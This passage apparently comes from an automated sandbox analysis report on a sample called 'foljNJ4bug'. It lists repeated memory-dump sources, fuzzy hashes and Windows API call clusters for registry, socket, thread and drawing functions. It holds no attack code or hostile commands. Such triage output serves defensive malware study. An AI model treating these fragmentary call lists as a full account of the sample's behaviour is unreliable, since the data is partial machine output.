                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __wcsnicmp
                                                                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                              • API String ID: 1038674560-2734436370
                                                                                                                                              • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                                                              • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                                                              • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                                                              • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                                                                              • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                                                              • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                                              • _wprintf.LIBCMT ref: 004340A1
                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                                              Strings
                                                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                              • API String ID: 3648134473-3128320259
                                                                                                                                              • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                                              • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                                                              • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                                              • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                                              • __lock.LIBCMT ref: 00417981
                                                                                                                                                • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                                                                • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                                                                • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                                              • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                                              • __lock.LIBCMT ref: 004179A2
                                                                                                                                              • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                              • String ID: KERNEL32.DLL$pI
                                                                                                                                              • API String ID: 637971194-197072765
                                                                                                                                              • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                              • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                                              • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                              • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _memmove$_malloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1938898002-0
                                                                                                                                              • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                                              • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                                                              • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                                              • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                                                              APIs
                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                                              • _memmove.LIBCMT ref: 0044B555
                                                                                                                                              • _memmove.LIBCMT ref: 0044B578
                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2737351978-0
                                                                                                                                              • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                                                              • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                                              • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                                                              • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                                              APIs
                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                                                              • __calloc_crt.LIBCMT ref: 00415246
                                                                                                                                              • __getptd.LIBCMT ref: 00415253
                                                                                                                                              • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                                                              • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                                                              • _free.LIBCMT ref: 0041529E
                                                                                                                                              • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                                                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3638380555-0
                                                                                                                                              • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                                                              • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                                                              • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                                                              • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                                                              APIs
                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                                                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                              • API String ID: 3207048006-625585964
                                                                                                                                              • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                              • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                                                              • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                                              • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                                                              APIs
                                                                                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                              • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                                                              • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                                              • _memmove.LIBCMT ref: 004656CA
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                                              • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2945290962-0
                                                                                                                                              • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                              • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                                              • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                              • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                                              APIs
                                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                                              • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                                              • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1457242333-0
                                                                                                                                              • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                              • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                                                                                              • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                                                                                              • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 15295421-0
                                                                                                                                              • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                              • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                                                                                              • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                                                                                              • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                              • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                              • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                              • _wcslen.LIBCMT ref: 00467793
                                                                                                                                              • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                                                              • String ID: X
                                                                                                                                              • API String ID: 780548581-3081909835
                                                                                                                                              • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                                                              • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                                                              • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                                                              • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                              • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                                                                                              • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                                                                                              • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                                                                                              • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                                                                                              • CloseFigure.GDI32(?), ref: 0044751F
                                                                                                                                              • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                                                                                              • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4082120231-0
                                                                                                                                              • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                              • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                                                                                              • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                                                                                              • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
